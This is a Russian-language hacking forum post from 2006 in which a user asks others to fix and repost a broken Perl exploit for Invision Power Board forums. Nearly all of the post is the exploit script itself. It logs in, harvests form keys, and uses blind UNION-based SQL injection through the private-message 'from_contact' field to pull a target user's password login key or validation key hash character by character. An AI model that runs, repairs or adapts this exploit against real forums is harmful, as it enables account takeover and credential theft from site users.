Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
17.07.2006, 00:17
|
|
Banned
Регистрация: 04.07.2006
Сообщений: 17
Провел на форуме:
86034
Репутация:
0
|
|
Volidation key
Скажите плиз как исправить ошибку в сплоите .если вам не трудно выложите исправленый сплойт плиз 
PHP код:
#!/usr/bin/perl
use HTTP::Cookies;
use LWP 5.64;
use HTTP::Request;
my $login_page = '?act=Login&CODE=01';
my $pm_page = '?act=Msg&CODE=04';
my $pose_pm_page = '?';
my $tries = 5;
my $sql = '';
my $hash = '';
my $need_null = 0;
my $i;
my $j;
my @charset = ('0' .. '9', 'a' .. 'f');
my %form = (act => 'Msg',
CODE => '04',
MODE => '01',
OID => '',
removeattachid => '',
msg_title => 'asdf',
bbmode => 'normal',
ffont => 0,
fsize => 0,
fcolor => 0,
LIST => ' LIST ',
helpbox => 'Insert Monotype Text (alt + p)',
tagcount => 0,
Post => 'jkl');
my $ua = LWP::UserAgent->new;
my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);
my $resp;
$ua->cookie_jar ($cj);
push @{ $ua->requests_redirectable }, "POST";
print "+-------------------------------------------------------------------------+\n";
print "| IPB Validation Key & Pass Exploit |\n";
print "| |\n";
print "| |Exploit Found & Researched By 3l3ctr1c and Demmo |\n";
print "| |\n";
print "| |Possible Idea Given By SHAK |\n";
print "| |Perl Modification By ReZEN of xorcrew |\n";
print "| |\n";
print "| |\n";
print "| |\n";
print "| |\n";
print "| For Information On How To Use This Exploit Visit the Above given URL(s) |\n";
print "| |\n";
print "| |\n";
print "+-------------------------------------------------------------------------+\n";
print 'IPB Forum URL ? ';
chomp (my $base_url = <STDIN>);
print 'Your username ? ';
chomp (my $user = <STDIN>);
$form{entered_name} = $user;
print 'Your pass ? ';
chomp (my $pass = <STDIN>);
print 'Target userid ? ';
chomp (my $tid = <STDIN>);
print "Type: ? \n 0. Password Hash \n 1. Validation Key Hash\n";
chomp (my $type = <STDIN>);
if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url }
if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' }
do {
$resp = $ua->post ($base_url . $login_page,
[ UserName => $user,
PassWord => $pass,
CookieDate => 1,
]);
} while ($tries-- && !$resp->is_success());
$tries = 5;
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }
if ($resp->content =~ /sorry, the password was wrong/i) {
die "Error: password incorrect.\n";
}
do {
$resp = $ua->get ($base_url . $pm_page);
} while ($tries-- && !$resp->is_success());
$tries = 5;
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }
if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?post_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+?/>#)
{
$form{post_key} = $1;
} else {
die "Error: couldn't get a post key.\n";
}
if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?auth_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+/>#)
{
$form{auth_key} = $1;
}
$| = 1;
print "\nAttempting to extract hash from database...\n ";
OFFSET:
for ($i = 0; $i < 32; ++$i) {
CHAR:
for ($j = 0; $j < @charset; ++$j) {
$tries = 5;
print "\x08", $charset[$j];
$vid = "vid";
if($type){
$sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR('
. (join (',', map {ord} split ('', $user))) . ') FROM '
. 'ibf_validating WHERE member_id = ' . $tid . ' AND MID('
. 'vid, ' . ($i + 1) . ', 1) = CHAR('
. ord ($charset[$j]) . ')';
}else{
$sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR('
. (join (',', map {ord} split ('', $user))) . ') FROM '
. 'ibf_members WHERE id = ' . $tid . ' AND MID('
. 'member_login_key, ' . ($i + 1) . ', 1) = CHAR('
. ord ($charset[$j]) . ')';
}
$form{from_contact} = $sql;
$resp = $ua->post ($base_url . $post_pm_page, \%form,
referer => $base_url . $pm_page);
if (!$resp->is_success()) {
die "\nError: " . $resp->status_line
. "\n" if (!$tries);
--$tries;
redo;
}
if ($resp->content =~ /sql error/i) {
if ($need_null) {
die "Error: SQL error.\n".$resp->content ;
} else {
$need_null = 1;
print $resp->content;
redo OFFSET;
}
} elsif ($resp->content !~ /there is no such member/i) {
print ' ';
next OFFSET;
}
}
die "\nError: couldn't get a char for offset $i\n";
}
print "\x08 \x08\nHit enter to quit.\n";
<STDIN>;
P/s:Зарание блогодарен |
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид